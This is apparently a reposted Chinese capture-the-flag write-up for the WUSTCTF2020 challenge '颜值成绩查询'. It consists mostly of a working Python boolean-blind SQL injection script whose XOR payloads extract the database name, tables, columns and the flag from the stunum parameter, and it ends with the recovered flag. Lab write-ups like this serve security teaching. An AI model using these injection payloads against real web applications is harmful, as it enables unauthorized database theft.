[WUSTCTF2020]颜值成绩查询
作者:互联网
打开网页
改变参数stunum发现页面会发生变化。
输入1 成绩100
输入2 成绩666
最多可以输入4
通过尝试可知参数处有布尔盲注,0^1会出现1的内容,因此判断具有盲注
构造脚本
import requests
url = "http://e7e05311-6b4e-4bce-8545-ff53476b26a9.node4.buuoj.cn:81"
database =""
payload1 = "?stunum=1^(ascii(substr((select(database())),{},1))>{})^1" #库名为ctf
payload2 = "?stunum=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})^1"#表名为flag,score
payload3 ="?stunum=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{})^1" #列名为flag,value
payload4 = "?stunum=1^(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))>{})^1" #
for i in range(1,10000):
low = 32
high = 128
mid =(low + high) // 2
while(low < high):
#payload = payload1.format(i,mid) #查库名
#payload = payload2.format(i,mid) #查表名
#payload = payload3.format(i,mid) #查列名
payload = payload4.format(i,mid) #查flag
new_url = url + payload
r = requests.get(new_url)
print(new_url)
if "Hi admin, your score is: 100" in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) //2
if (mid == 32 or mid == 132):
break
database +=chr(mid)
print(database)
print(database)
flag{a35e0b79-a19d-491b-b1de-7222e913766c}
标签:WUSTCTF2020,颜值,mid,查询,high,flag,low,stunum,payload 来源: https://www.cnblogs.com/SONGYUELV/p/15417219.html